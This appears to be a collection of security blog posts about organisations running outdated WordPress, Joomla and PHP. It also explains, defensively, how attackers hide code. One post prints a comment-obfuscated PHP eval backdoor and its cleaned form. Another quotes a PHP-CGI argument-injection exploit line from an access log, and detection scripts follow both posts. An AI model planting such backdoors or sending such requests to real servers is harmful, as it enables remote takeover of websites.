Acunetix Website Running Outdated and Insecure Version of WordPress

In our dealings with the security of websites, one of the biggest obstacles to improving security is that basic security measures are often not taken, while there are lots of companies trying to push additional security measures that are not needed in most situations and in many cases are not going to provide additional protection against threats. A major cause of this seems to be that many companies involved in providing security services are not actually concerned about security, whether for their own website or yours. Acunetix provides a good example of this. Acunetix is the maker of a vulnerability scanner for websites and promotes itself as the “worldwide leader in web application security”. Their scanner has a number of features specifically for looking at vulnerabilities in WordPress, including checking for outdated plugins. Based on all of that you would expect that they would be making sure to take the basic step of keeping the installation of WordPress running their website up to date, but surprisingly you would be wrong:

Acunetix is Running WordPress 3.5.1

It has now been nearly two months since WordPress 3.5.2, which included several security fixes, was released. In the release announcement for that version users were warned:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

When a company providing the tools to keep websites secure is failing to take care of basic security measures on their own website it doesn’t bode well for website security improving in the near term.

OpenX Doesn’t Take Security Seriously

Earlier this week it was discovered that the downloads of OpenX 2.8.10 had been modified at some point to include malicious code that allowed remote code execution. OpenX’s blog post about the incident starts with the claim that “OpenX takes security seriously.” This isn’t the first time they have claimed that in a blog post (that previous blog post has the dubious distinction of being the third post named Security Matters on their blog). The claim that they take security seriously is hard to square with what happened in this instance, especially in light of previous events. Unlike the issues mentioned in those previous blog posts, which involved unintentional security vulnerabilities, in this case someone was able to gain access to OpenX’s website and modify files on it to include malicious code without being detected by them. It only came to light that the files had been modified after the vulnerability added to the download was being actively exploited.

That isn’t something that should happen and it would be a big red flag that security isn’t taken seriously if it had only happened once. But this doesn’t seem to be the first time that OpenX’s website has been breached. It appears that their website was previously breached and used to exploit OpenX ad servers in April of last year. OpenX 2.8.10 wasn’t released until September of last year, so this most recent issue would have come either from a subsequent breach or from them not shutting off access after the first breach was detected.

Their post emphasizes that their other products were not impacted by the vulnerability in the downloads, but considering they were breached and didn’t detect it, it is reasonable to be concerned that the breach may have reached other parts of their systems. Their post gives no indication that they made any check to ensure that that is the case.

The claim that they take security seriously is even harder to believe in light of the fact that they fail to take basic security measures with their website even after having their website breached at least twice. This can be seen by their use of an outdated version of WordPress on the very blog where they are claiming to take security seriously:

OpenX Blog is Running WordPress 3.4.1

WordPress 3.4.1 is eleven months out of date and there have been three updates with security fixes released (3.4.2, 3.5.1, and 3.5.2). The announcement for 3.5.2, released on June 21, included this message, which OpenX has ignored:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

WordPress is very easy to update, so if they can’t manage to do that it seems likely that they are failing to take other more complicated security measures that need to be taken when a website is being targeted, as theirs has been.

OpenX Ignores Security Issue

Back in July of last year we sent an email to OpenX’s security email address to inform them that there was a vulnerability in the Zend Framework that ships with OpenX. We never heard anything back from them and the vulnerable file has not been updated in OpenX.

WPTemplate.com Spreads Bad Information on Securing WordPress

When it comes to the security of WordPress there are unfortunately a lot of people out there spreading bad information. We were on the receiving end of one of these in the past few days. We received an email from xpedientdigitalmedia.com trying to get us to promote an infographic on WordPress security from their website WPTemplate.com. You can tell how much they care about security when you see this:

WPTemplate.com is Running WordPress 3.5.1

Keeping WordPress up to date is one of the basic security measures that you need to be taking to make sure your website is secure. If you are running a website about WordPress you have no excuse for not keeping it up to date, especially when the release notice for the new version, released last month, warns:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

Amazingly their security advice includes making sure to keep WordPress up to date, but they don’t follow their own advice and you shouldn’t either.

It really isn’t worth going through all of the bad information they managed to pack in to their infographic, but here are a couple of really bad pieces of advice:

One of their security recommendations is “Do not install WordPress themes that are available for free.” Something being free doesn’t make it insecure and something costing money doesn’t make it secure. WordPress is free; would that make it insecure? Do they think that the free themes on the WordPress website are insecure?

The second one is a doozy. They claim that one of the “most common ways that result in the site being hacked” is “approving comments that are non relevant”. This isn’t even a way to be hacked, much less a common one. If adding a comment could lead to your website being hacked that would be a huge security vulnerability, and the solution wouldn’t be to not approve irrelevant comments. What would stop someone from exploiting the vulnerability with a relevant comment instead?

Unfortunately their bad advice isn’t just on their website. A lot of websites have taken up their offer to spread the thing, including noupe, WP Daily Themes, and WP Daily. Incidentally, WP Daily titled their post on WordPress 3.5.2 UH OH. WP 3.5.2 SECURITY UPDATE. DO THIS NOW. and yet they didn’t:

WP Daily Website is Running WordPress 3.5.1

A Step To Actually Improve WordPress Security

Currently if a plugin in the WordPress.org Plugin Directory is found to have a security vulnerability and it is not fixed the plugin is removed from the Plugin Directory. Unfortunately anyone who is already using the plugin is not provided any alert that the plugin is known to be insecure. We have been pushing for this situation to be handled properly for some time. Until an alert is added in WordPress itself, you can get a more limited version of this functionality using our No Longer in Directory plugin.

Checkmarx Website Running Outdated and Insecure Version of WordPress

In yet another sad sign of how bad internet security is these days, a security company named Checkmarx released findings on security vulnerabilities in WordPress plugins (PDF) while running their own website on an outdated and insecure version of WordPress:

Checkmarx Website is Running WordPress 3.4.1

Checkmarx has failed to apply the last two security update releases of WordPress: WordPress 3.4.1, which was released in September of 2012, and WordPress 3.5.1, which was released in January.

In their report one of their recommendations is keeping plugins up to date:

3. Ensure all your plugins are up to date
Do not ignore all those notification emails of an upgraded plugin version. You can even use a purposeful WordPress plugin that notifies admins on updates to other installed plugins. There are also third party services which provide a plugin update notification and management offering.

How is it that security companies that seem to understand basic security practices fail to take them with their own websites?

Also, on Checkmarx’s website they tout they are a member of the Open Web Application Security Project (OWASP), which we recently noted also runs their website on outdated and insecure software.

Another Security Recommendation for WordPress Plugins

Checkmarx’s report is missing one important step that should be taken related to security of WordPress plugins. Currently if a plugin in the WordPress.org Plugin Directory is found to have a security vulnerability and it is not fixed the plugin is removed from the Plugin Directory. Unfortunately anyone who is already using the plugin is not provided any alert that the plugin is known to be insecure. We have been pushing for this situation to be handled properly for some time. Until an alert is added in WordPress itself, you can get a more limited version of this functionality using our No Longer in Directory plugin.

CIO.gov Running Outdated and Insecure Version of WordPress

In the recent past we have mentioned that the websites of the White House, Department of Homeland Security, and FEMA are failing to take the basic security step of keeping the software powering their websites up to date. It then should not come as too much of a surprise to see this:

CIO.gov is Running WordPress 3.4.2

CIO.gov is the website of the U.S. Chief Information Officer and the Federal CIO Council, and on the website it is described as “serving as a central resource for information on Federal IT” and “identifying best practices”.

Since the website is running WordPress 3.4.2 they failed to update WordPress for seven months and more importantly they failed to update when a security release was put out back in January.

With the US government’s and CIO Council’s claimed focus on cybersecurity it is troubling that they are failing to do something so basic. It also raises questions about one of the CIO Council’s areas of cybersecurity focus, “Continuous Monitoring”:

Continuous monitoring is a risk management approach to cybersecurity that maintains an accurate picture of an agency’s security risk posture, provides visibility into assets, and leverages use of automated data feeds to quantify risk, ensure effectiveness of security controls, and implement prioritized remedies. A well-designed and well-managed continuous monitoring program can effectively transform an otherwise static security control assessment and risk determination process into a dynamic process that provides essential, near real-time security status.

In today’s environment of widespread cyber-intrusions, advanced persistent threats, and insider threats, it is essential for agencies to have real-time accurate knowledge of their enterprise IT overall security posture. Agencies need to constantly know and remain aware of their enterprise security status so that responses to external and internal threats can be made swiftly.

If continuous monitoring is being used for their own website it isn’t working. If it isn’t being used, you have to wonder why it is one of their focuses when they haven’t even started using it themselves.

Wired’s Threat Level Blog Running Outdated and Insecure Version of WordPress

Keeping software running on a website up to date is an important part of keeping it secure, but, as we have been focusing on a lot lately, organizations that you would expect to be up to the task of handling their security are failing to do that. Whether it is web security companies, a web security organization, or major government websites (the DHS did finally get their website up to date, though), they are all failing to take this easy security step. We can now add web security journalism to this recent list.

Here is the WordPress version powering Wired’s Threat Level blog, which covers “Privacy, Crime and Security Online”:

Wired's Threat Level blog is Running WordPress 3.4.2

Since they are running 3.4.2 they failed to update WordPress for seven months and more importantly they failed to update when a security release was put out back in January. If an important source of security information isn’t aware they need to keep their website up to date, it isn’t a good sign that others will be getting that information either.

NATO’s Allied Command Transformation Website Running Outdated and Unsupported Version of Joomla

NATO ministers met last week and discussed improving their cybersecurity. A bad sign for their current handling of cybersecurity is the website of NATO’s Allied Command Transformation, which is running an outdated and unsupported version of Joomla:

NATO Allied Command Transformation Website is Running Joomla 1.5

Security updates for Joomla 1.5 ended in September of 2012, so the website should have been migrated to a supported version of Joomla – currently versions 2.5 and 3.1 – some time ago.

Keeping the software powering a website up to date is a basic measure needed to keep it secure, and it is relatively easy in comparison to what NATO needs to do to fully secure all of their systems.

It might be reasonable to cut NATO some slack on their failure to keep up to date considering that the Joomla project itself is still running Joomla 1.5 on a number of their websites:

Joomla Extensions Directory is Running Joomla 1.5

Joomla Community Portal is Running Joomla 1.5

Joomla Resource Directory is Running Joomla 1.5

Impermium Has Web Security and Spam Issues of Their Own

Impermium promotes itself as “Protecting the Web from Security Threats”, claims that they are “run by leading anti-spam and cybersecurity experts”, and that they have “a cutting-edge comment spam filter”; but a quick look shows that they can’t even handle web security and spam on their own website.

Keeping software running on a website up to date is one of the basic website security measures that should be taken, so a company run by “cybersecurity experts” is going to be doing that right? Wrong:

Impermium is Running WordPress 3.4.2

Not only have they failed to update WordPress for over six months, but they failed to update when a security release was put out back in January. WordPress makes it very easy to update, so there isn’t any excuse for not doing it. They are not alone in this; a few weeks ago we mentioned that the web security company StopTheHacker also was running the same outdated version of WordPress. What does it say that web security companies either don’t know the basics of website security or don’t care about it?

As for spam, here is the Impermium Knowledge Base:

Impermium Knowledge Base

If you are an anti-spam company you shouldn’t miss spam entries like “Significant Bad Credit Loans for Debt Consolidation Loan” and “Know how different types of loans could benefit you” in your Knowledge Base.

Hackers Attempting To Hide Malicious Code in Files With Comments

When hackers add malicious code to a website’s files they often obfuscate it in some way. A simple method looks like this:

eval(base64_decode('...'));

This method isn’t very effective at disguising the code, as it sticks out: it is easy enough to search through all the files on a website for eval(base64_decode( and the similar functions that get used, find the matching code, and then undo the obfuscation to check for malicious code. We sometimes see other methods that are more effective, but more often than not the less effective ones are used. One other method that we have been seeing used a lot recently is hiding the code among numerous comments. Because comments are ignored when the code is executed, the additional text only impacts someone trying to review the code. Here is one example of malicious code hidden among comments:

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/'j'/*jMe*/./*(J&I8*/'g'/*(MJg:*/./*tj9-*/'k'/*79Y|yO*/./*ylwhw*/'vo'/*AKO'\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

It probably looks like a bunch of gibberish to you, but amongst the apparent gibberish is the malicious code. The original post highlighted it in bold within the same line; that highlighting is lost here, so the code is shown on its own below.

When the comments are stripped out and the pieces of the split-up string ('j'.'g'.'k'.'vo') are joined back together, you can see the code by itself:

if(isset($_REQUEST['jgkvo']))eval(stripslashes($_REQUEST['jgkvo']));

That code is a simple backdoor: it executes whatever PHP code is sent in the request parameter “jgkvo” to any web page that the malicious code has been placed in.
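One way to surface this kind of padding during a review is to do what the post describes by hand: strip the comments, re-join the split-up string literals, and then look for the patterns that remain. The following Python script is an added example, not code from the original post; it uses a simple regex in place of a real PHP tokenizer, and its 0.5 comment-density threshold is an assumed value.

```python
import re

# Constructed sample: the comment-padded backdoor quoted in the post, with the
# curly quotes the rendered page shows restored to plain single quotes.
SAMPLE = r"""/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/'j'/*jMe*/./*(J&I8*/'g'/*(MJg:*/./*tj9-*/'k'/*79Y|yO*/./*ylwhw*/'vo'/*AKO'\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/"""

# A PHP block comment. A production scanner should use PHP's own tokenizer
# (token_get_all) so that "/*" inside a string literal is not mistaken for a
# comment; this regex is enough for the padding style shown in the post.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Two adjacent single-quoted literals joined with PHP's "." operator.
CONCAT = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
# What to look for once the noise is gone.
SUSPICIOUS = [
    ("eval() of request data",
     re.compile(r"eval\s*\(.*\$_(REQUEST|GET|POST|COOKIE)", re.DOTALL)),
    ("eval() of base64_decode() output",
     re.compile(r"eval\s*\(\s*base64_decode\s*\(")),
]
COMMENT_RATIO_LIMIT = 0.5  # assumed threshold for "padded with comments"


def strip_block_comments(php: str) -> str:
    return BLOCK_COMMENT.sub("", php)


def fold_string_concat(php: str) -> str:
    """Repeatedly join 'a'.'b' into 'ab' so split-up names become readable."""
    while True:
        php, changed = CONCAT.subn(r"'\g<1>\g<2>'", php)
        if not changed:
            return php


def comment_ratio(php: str) -> float:
    """Fraction of the source text that sits inside block comments."""
    if not php:
        return 0.0
    commented = sum(len(m.group(0)) for m in BLOCK_COMMENT.finditer(php))
    return commented / len(php)


def analyze(php: str) -> dict:
    """Deobfuscate the snippet and report why (if at all) it looks malicious."""
    cleaned = fold_string_concat(strip_block_comments(php))
    findings = [label for label, rx in SUSPICIOUS if rx.search(cleaned)]
    ratio = comment_ratio(php)
    if ratio > COMMENT_RATIO_LIMIT:
        findings.append("comment padding (%d%% of bytes are comments)" % round(ratio * 100))
    return {"cleaned": cleaned, "comment_ratio": ratio, "findings": findings}


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(report["cleaned"])
    for finding in report["findings"]:
        print(" -", finding)
```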

Is Your Web Host Keeping PHP Up to Date?

When it comes to keeping your website secure, your web host should be the least of your worries. These are technology companies, sometimes rather large, whose focus is on websites. You would think that they would be better at handling website security than anyone other than security professionals. Unfortunately we often find that they are not. As just one example, last year we discussed the fact that Media Temple was incorrectly blaming a hack of websites hosted by them on their customers running outdated software on their websites, while they themselves were running outdated software on their own website. Over a year later they are still not bothering to take the basic step of keeping the software running on their website up to date:

Media Temple's System Status Website is Running WordPress 3.3.2

Trying to assess the security of web hosts is difficult because much of the information needed to do that assessment is only available to them. There are some things that you can check on, and one of those is whether they are keeping the version of PHP on the server hosting your website up to date. If you are using WordPress, Joomla, Drupal, or a lot of other web software then you are using PHP, and it is important to keep that up to date, as a hacked website we cleaned up this week shows.

One of the basic steps of cleaning up a hacked website is determining how it was hacked and then fixing the vulnerability so that the website doesn’t get hacked again (unfortunately, many companies that clean up hacked websites cut corners and don’t do this). In reviewing the log files for the website in question we traced the original exploitation to this line in the website’s access log:

91.224.160.25 - - [16/Apr/2013:19:18:32 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 68

What that shows is an attempt to exploit a vulnerability in PHP versions prior to 5.3.13 and 5.4.3. Unfortunately the website in question was running an older, vulnerable version of PHP and was configured in a way that made it susceptible to the vulnerability. If PHP had been kept up to date the website would not have been hacked.

The PHP developers fairly regularly release new versions that fix security vulnerabilities in the software. The most recent releases with security fixes were versions 5.3.23 and 5.4.13, released in March. Unfortunately, we often find that our clients’ web hosts are not keeping PHP up to date. If your web host isn’t keeping PHP updated you probably should move to a web host that takes such basic security seriously.
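A defender can pick these attempts out of an access log by reproducing the rule php-cgi itself applied: a query string with no unencoded “=” is handed to the script as command-line switches, which is why the “=” in the request above is encoded as %3d. The script below is an added example, not code from the original post; the log regex, the 203.0.113.x sample lines and the function names are constructed here, and the version check uses the 5.3.13 / 5.4.3 fix releases named above.

```python
import re
from urllib.parse import unquote

# Constructed sample log: the first line is the request quoted in the post,
# the other two are benign requests made up for contrast.
ACCESS_LOG = """\
91.224.160.25 - - [16/Apr/2013:19:18:32 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 68
203.0.113.7 - - [16/Apr/2013:19:20:01 -0400] "GET /?p=123 HTTP/1.1" 200 5120
203.0.113.9 - - [16/Apr/2013:19:21:15 -0400] "GET /index.php?s=-d+something HTTP/1.1" 200 77
"""

# Common/combined log format, matched up to the status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def php_cgi_argv(target: str):
    """Return the argv php-cgi would receive for this request, or None.

    Per the CGI spec a query string with no unencoded '=' is passed to the
    script as command-line arguments split on '+'. The '-d' switches only
    appear after that split, which PHP before 5.3.13 / 5.4.3 did not reject.
    """
    if "?" not in target:
        return None
    query = target.split("?", 1)[1]
    if "=" in query:
        return None
    return [unquote(arg) for arg in query.split("+")]


def detect(line: str):
    """Flag a log line whose query string would reach php-cgi as switches."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    argv = php_cgi_argv(m.group("target"))
    if not argv or not argv[0].startswith("-"):
        return None
    # Values following '-d' are php.ini settings the request tried to override.
    directives = [argv[i + 1] for i, a in enumerate(argv[:-1]) if a == "-d"]
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "status": int(m.group("status")), "argv": argv,
            "directives": directives}


def scan(log_text: str) -> list:
    return [hit for hit in map(detect, log_text.splitlines()) if hit]


def php_fixed_for_cgi_bug(version: str) -> bool:
    """True if a PHP version is at or past the fixed releases named in the
    post (5.3.13 for the 5.3 branch, 5.4.3 for 5.4 and anything newer)."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    if parts[:2] == (5, 3):
        return parts >= (5, 3, 13)
    return parts >= (5, 4, 3)


if __name__ == "__main__":
    for hit in scan(ACCESS_LOG):
        print(hit["ip"], hit["time"], hit["directives"])
    print("5.3.10 fixed:", php_fixed_for_cgi_bug("5.3.10"))
```

Because the third sample line carries a literal “=”, it is not flagged even though it contains “-d”: the query never becomes argv, so the rule produces no false positive there.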

If you are wondering what version of PHP your web host is using for your website there are a number of ways to find that out. The least technical way is to contact their customer support and ask them what version of PHP is in use. It would also be good to ask them what their upgrade policy is for PHP and the other software powering the web server, to make sure that they are handling that properly. You can sometimes find the PHP version in use in the control panel for your website or in the administrative area of the website. You can also use a tool we have created that allows you to check the version of various software running on the server your website is on.